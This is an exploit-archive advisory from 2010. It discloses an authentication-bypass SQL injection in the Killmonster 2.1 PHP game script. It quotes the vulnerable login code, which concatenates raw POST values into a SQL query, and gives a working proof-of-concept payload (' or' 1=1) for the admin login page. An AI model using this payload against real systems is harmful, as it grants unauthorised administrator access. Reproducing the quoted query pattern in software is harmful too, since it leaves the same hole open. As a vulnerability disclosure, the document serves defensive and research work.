[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Killmonster <= 2.1 (Auth Bypass) SQL Injection Vulnerability
# Published : 2010-02-07
# Author : cr4wl3r
# Previous Title : Croogo v1.2.1 Multiple CSRF Vulnerabilities
# Next Title : EncapsCMS <= 0.3.6 (config[path]) Remote File Include Vulnerability
[+] Killmonster <= 2.1 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org>
[+] Download : http://scripts.ringsworld.com/games-and-entertainment/km2/
[+] Vuln Code :
[login.php]
<form method="POST" action="authenticate.php">
Type Username Here: <input type="text" name="isadmin" size="15"><br>
Type Password Here: <input type="password" name="password" size="15" mask="x"><br>
<input type="submit" value="submit" name="submit">
[authenticate.php]
$isadmin=$_POST['isadmin'];
$password=$_POST['password'];
$password=md5($password);
$query = "select * from km_admins where username='$isadmin' and password='$password'";
$result = mysql_query($query) ;
[+] PoC : [Killmonster_path]/admin/login.php
username : ' or' 1=1
password : ' or' 1=1